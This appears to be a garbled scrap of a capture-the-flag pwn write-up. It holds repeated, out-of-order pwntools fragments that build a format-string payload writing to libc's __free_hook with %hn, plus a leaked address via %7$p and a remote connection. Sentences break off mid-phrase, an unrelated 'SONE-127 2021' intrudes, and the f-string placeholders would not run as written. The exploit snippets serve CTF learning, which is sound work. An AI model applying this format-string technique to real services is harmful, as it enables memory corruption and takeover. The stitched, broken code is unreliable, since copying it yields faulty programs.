# Build the format string payload = b'A'*8 payload += f"%lowc%8$hn".encode() payload += f"%diffc%9$hn".encode() payload += b'B'*8 payload += p64(free_hook) # 8th argument payload += p64(free_hook + 2) # 9th argument
# Load the exact libc version used on the server (provided by the challenge) libc = ELF('libc-2.31.so')
> echo %7$p 0x7f5c1a2b2e30 The address 0x7f5c1a2b2e30 belongs to the (high address > 0x7f000000).
def main(): io = remote(HOST, PORT)
# Build the format string payload = b'A'*8 payload += f"%lowc%8$hn".encode() payload += f"%diffc%9$hn".encode() payload += b'B'*8 payload += p64(free_hook) # 8th argument payload += p64(free_hook + 2) # 9th argument
# Load the exact libc version used on the server (provided by the challenge) libc = ELF('libc-2.31.so') SONE-127 2021
> echo %7$p 0x7f5c1a2b2e30 The address 0x7f5c1a2b2e30 belongs to the (high address > 0x7f000000). # Build the format string payload = b'A'*8
def main(): io = remote(HOST, PORT)